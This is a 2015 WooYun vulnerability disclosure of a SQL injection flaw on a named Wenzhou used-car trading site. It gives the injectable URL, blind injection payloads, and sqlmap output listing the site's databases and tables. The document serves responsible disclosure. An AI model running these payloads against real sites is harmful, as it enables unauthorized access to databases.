漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0126231
漏洞标题:温州二手车交易网主站sql注入漏洞
相关厂商:温州二手车交易网
漏洞作者: Dormant
提交时间:2015-07-15 12:31
修复时间:2015-08-31 16:10
公开时间:2015-08-31 16:10
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-17: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向核心白帽子及相关领域专家公开
2015-08-06: 细节向普通白帽子公开
2015-08-16: 细节向实习白帽子公开
2015-08-31: 细节向公众公开
简要描述:
温州二手车交易网主站sql注入漏洞
详细说明:
注入点:http://www.wz2sc.com/coms.php?com_title=
直接丢sqlmap里跑把!
Place: GET
Parameter: com_title
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: com_title=%' AND 3806=3806 AND '%'='
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: com_title=%' AND SLEEP(5) AND '%'='
---
[00:02:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.8
back-end DBMS: MySQL 5.0.11
[00:02:09] [INFO] fetching database names
[00:02:09] [INFO] fetching number of databases
[00:02:09] [INFO] resumed: 10
[00:02:09] [INFO] resumed: information_schema
[00:02:09] [INFO] resumed: ctb
[00:02:09] [INFO] resumed: i2sc
[00:02:09] [INFO] resumed: jiazhao
[00:02:09] [INFO] resumed: lqsc
[00:02:09] [INFO] resumed: mysql
[00:02:09] [INFO] resumed: paibiqu
[00:02:09] [INFO] resumed: paichequ
[00:02:09] [INFO] resumed: performance_schema
[00:02:09] [INFO] resumed: wz2sc
available databases [10]:
[*] ctb
[*] i2sc
[*] information_schema
[*] jiazhao
[*] lqsc
[*] mysql
[*] paibiqu
[*] paichequ
[*] performance_schema
[*] wz2sc
current database: 'wz2sc'
猜表:
[00:04:44] [INFO] resumed: coms_url_0731
[00:04:44] [INFO] resumed: coms_url_0735
[00:04:44] [INFO] resumed: coms_url_0745
[00:04:44] [INFO] resumed: coms_url_0798
[00:04:44] [INFO] resumed: coms_url_0838
[00:04:44] [INFO] resumed: coms_url_0851
[00:04:44] [INFO] resumed: coms_url_0871
[00:04:44] [INFO] resumed: coms_url_0951
[00:04:44] [INFO] resumed: comurl
[00:04:44] [INFO] resumed: comurl_020
[00:04:44] [INFO] resumed: comurl_021
[00:04:44] [INFO] resumed: comurl_023
[00:04:44] [INFO] resumed: comurl_025
[00:04:44] [INFO] resumed: comurl_0311
[00:04:44] [INFO] resumed: comurl_0371
[00:04:44] [INFO] resumed: comurl_0379
[00:04:44] [INFO] resumed: comurl_0394
[00:04:44] [INFO] resumed: comurl_0412
[00:04:44] [INFO] resumed: comurl_0416
[00:04:44] [INFO] resumed: comurl_0471
[00:04:44] [INFO] resumed: comurl_0476
[00:04:44] [INFO] resumed: comurl_0519
[00:04:44] [INFO] resumed: comurl_0531
[00:04:44] [INFO] resumed: comurl_0532
[00:04:44] [INFO] resumed: comurl_0551
[00:04:44] [INFO] resumed: comurl_0558
[00:04:44] [INFO] resumed: comurl_0570
[00:04:44] [INFO] resumed: comurl_0571
[00:04:44] [INFO] resumed: comurl_0572
[00:04:44] [INFO] resumed: comurl_0573
[00:04:44] [INFO] resumed: comurl_0574
[00:04:44] [INFO] resumed: comurl_0575
[00:04:44] [INFO] resumed: comurl_0576
[00:04:44] [INFO] resumed: comurl_0578
[00:04:44] [INFO] resumed: comurl_0579
[00:04:44] [INFO] resumed: comurl_0580
[00:04:44] [INFO] resumed: comurl_0591
[00:04:44] [INFO] resumed: comurl_0593
[00:04:44] [INFO] resumed: comurl_0595
[00:04:44] [INFO] resumed: comurl_0596
[00:04:44] [INFO] resumed: comurl_0735
[00:04:44] [INFO] resumed: comurl_0745
[00:04:44] [INFO] resumed: comurl_0791
[00:04:44] [INFO] resumed: comurl_0798
[00:04:44] [INFO] resumed: comurl_0838
[00:04:44] [INFO] resumed: comurl_0851
[00:04:44] [INFO] resumed: comurl_0871
[00:04:44] [INFO] resumed: comurl_0951
[00:04:44] [INFO] resumed: daiban
[00:04:44] [INFO] resumed: diqu
[00:04:44] [INFO] resumed: email
[00:04:44] [INFO] resumed: email_020
[00:04:44] [INFO] resumed: email_021
[00:04:44] [INFO] resumed: email_023
[00:04:44] [INFO] resumed: email_025
[00:04:44] [INFO] resumed: email_0311
[00:04:44] [INFO] resumed: email_0371
[00:04:44] [INFO] resumed: email_0379
[00:04:44] [INFO] resumed: email_0394
[00:04:44] [INFO] resumed: email_0412
[00:04:44] [INFO] resumed: email_0416
[00:04:44] [INFO] resumed: email_0471
[00:04:44] [INFO] resumed: email_0476
[00:04:44] [INFO] resumed: email_0519
[00:04:44] [INFO] resumed: email_0532
[00:04:44] [INFO] resumed: email_0551
[00:04:44] [INFO] resumed: email_0558
[00:04:44] [INFO] resumed: email_0574
[00:04:44] [INFO] resumed: email_0576
[00:04:44] [INFO] resumed: email_0578
[00:04:44] [INFO] resumed: email_0579
[00:04:44] [INFO] resumed: email_0591
[00:04:44] [INFO] resumed: email_0592
[00:04:44] [INFO] resumed: email_0593
[00:04:44] [INFO] resumed: email_0595
[00:04:44] [INFO] resumed: email_0596
[00:04:44] [INFO] resumed: email_0735
[00:04:44] [INFO] resumed: email_0745
[00:04:44] [INFO] resumed: email_0791
[00:04:44] [INFO] resumed: email_0793
[00:04:44] [INFO] resumed: email_0798
[00:04:44] [INFO] resumed: email_0838
[00:04:44] [INFO] resumed: email_0871
[00:04:44] [INFO] resumed: email_0951
[00:04:44] [INFO] resumed: email_copy1
[00:04:44] [INFO] resumed: fen_ling
[00:04:44] [INFO] resumed: gaojiashouche
[00:04:44] [INFO] resumed: group
[00:04:44] [INFO] resumed: handset_for_wz2sc
[00:04:44] [INFO] resumed: handsets
[00:04:44] [INFO] resumed: handsets_020
[00:04:44] [INFO] resumed: handsets_021
[00:04:44] [INFO] resumed: handsets_023
[00:04:44] [INFO] resumed: handsets_025
[00:04:44] [INFO] resumed: handsets_0311
[00:04:44] [INFO] resumed: handsets_0371
[00:04:44] [INFO] resumed: handsets_0379
[00:04:44] [INFO] resumed: handsets_0394
[00:04:44] [INFO] resumed: handsets_0412
[00:04:44] [INFO] resumed: handsets_0416
[00:04:44] [INFO] resumed: handsets_0471
[00:04:44] [INFO] resumed: handsets_0476
[00:04:44] [INFO] resumed: handsets_0519
[00:04:44] [INFO] resumed: handsets_0531
[00:04:44] [INFO] resumed: handsets_0532
[00:04:44] [INFO] resumed: handsets_0551
[00:04:44] [INFO] resumed: handsets_0558
[00:04:44] [INFO] resumed: handsets_0570
[00:04:44] [INFO] resumed: handsets_0571
[00:04:44] [INFO] resumed: handsets_0572
[00:04:44] [INFO] resumed: handsets_0573
[00:04:44] [INFO] resumed: handsets_0574
[00:04:44] [INFO] resumed: handsets_0575
[00:04:44] [INFO] resumed: handsets_0576
[00:04:44] [INFO] resumed: handsets_0578
[00:04:44] [INFO] resumed: handsets_0579
[00:04:44] [INFO] resumed: handsets_0580
[00:04:44] [INFO] resumed: handsets_0591
[00:04:44] [INFO] resumed: handsets_0595
[00:04:44] [INFO] resumed: handsets_0596
[00:04:44] [INFO] resumed: handsets_0731
[00:04:44] [INFO] resumed: handsets_0735
[00:04:44] [INFO] resumed: handsets_0791
[00:04:44] [INFO] resumed: handsets_0793
[00:04:44] [INFO] resumed: handsets_0798
[00:04:44] [INFO] resumed: handsets_0838
[00:04:44] [INFO] resumed: handsets_0851
[00:04:44] [INFO] resumed: handsets_0871
[00:04:44] [INFO] resumed: handsets_0951
[00:04:44] [INFO] resumed: jcpm
[00:04:44] [INFO] resumed: jifenall
[00:04:44] [INFO] resumed: jifenlist
[00:04:44] [INFO] resumed: jingpin
[00:04:44] [INFO] resumed: jingpin_021
[00:04:44] [INFO] resumed: jingpin_023
[00:04:44] [INFO] resumed: jingpin_025
太多了 我就不跑了
漏洞证明:
注入点:http://www.wz2sc.com/coms.php?com_title=
Place: GET
Parameter: com_title
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: com_title=%' AND 3806=3806 AND '%'='
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: com_title=%' AND SLEEP(5) AND '%'='
---
[00:02:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.8
back-end DBMS: MySQL 5.0.11
[00:02:09] [INFO] fetching database names
[00:02:09] [INFO] fetching number of databases
[00:02:09] [INFO] resumed: 10
[00:02:09] [INFO] resumed: information_schema
[00:02:09] [INFO] resumed: ctb
[00:02:09] [INFO] resumed: i2sc
[00:02:09] [INFO] resumed: jiazhao
[00:02:09] [INFO] resumed: lqsc
[00:02:09] [INFO] resumed: mysql
[00:02:09] [INFO] resumed: paibiqu
[00:02:09] [INFO] resumed: paichequ
[00:02:09] [INFO] resumed: performance_schema
[00:02:09] [INFO] resumed: wz2sc
available databases [10]:
[*] ctb
[*] i2sc
[*] information_schema
[*] jiazhao
[*] lqsc
[*] mysql
[*] paibiqu
[*] paichequ
[*] performance_schema
[*] wz2sc
修复方案:
过滤
版权声明:转载请注明来源 Dormant@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-07-17 16:08
厂商回复:
最新状态:
暂无